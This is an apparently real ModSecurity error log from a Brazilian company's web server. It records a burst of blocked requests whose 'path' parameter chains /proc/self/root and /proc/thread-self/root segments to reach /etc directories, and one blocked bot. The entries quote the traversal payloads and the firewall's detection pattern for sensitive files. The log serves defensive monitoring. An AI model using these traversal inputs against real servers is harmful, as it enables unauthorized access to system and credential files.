[Mon Mar 16 08:19:50.686533 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:57662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnVhXjF1vJNtV6CWre7AAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:51.814530 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:52392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnV9SswJuvopo3lOhFDgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:53.181044 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:52398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnWXjZBu2q05ozVU85ngAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:54.567160 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:52400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnWtSswJuvopo3lOhFDwAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:59.042765 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.241.46:52416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnXwlT9VtDQc7bgUyMOwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:20:04.423017 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.241.46:42892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnZJqj1wV0Si-OkefNhgAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:05.715667 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.241.46:42898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnZZqj1wV0Si-OkefNhwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:20:08.615470 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.243.203:32846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnaHbQATo66fKoS7wumAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:20:09.919226 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:59976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnaXjZBu2q05ozVU85tAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:13.781616 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.228.16:41072] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfnbXjZBu2q05ozVU85wAAAAVY"]
[Mon Mar 16 08:20:17.721445 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.241.46:42906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfncXjZBu2q05ozVU85ywAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:20:22.436902 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:35654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfndpqj1wV0Si-OkefNjAAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:20:28.410575 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:35664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnfLysWC90G-1nBrAqXQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:20:31.809652 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:39582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnf3jZBu2q05ozVU854gAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:33.093787 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:51676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfngRXjF1vJNtV6CWre7gAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:45.387404 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.241.46:39542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnjQlT9VtDQc7bgUyMXAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:48.462687 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.241.46:39092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnkJqj1wV0Si-OkefNkAAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:50.815582 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:33898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnktSswJuvopo3lOhFFAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:55.348721 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:33908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnl_9ocpUE4ed4uDzS4QAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:57.664690 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:33920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnmdSswJuvopo3lOhFFwAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:20:58.920410 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:55588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnmpqj1wV0Si-OkefNlAAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:00.176491 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:51686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnnAlT9VtDQc7bgUyMawAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:21:03.755652 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.241.46:55600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnn3bQATo66fKoS7wuoQAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:05.124116 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:55608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnoY6lpbStxTqkSktRtAAAAlQ"], referer: 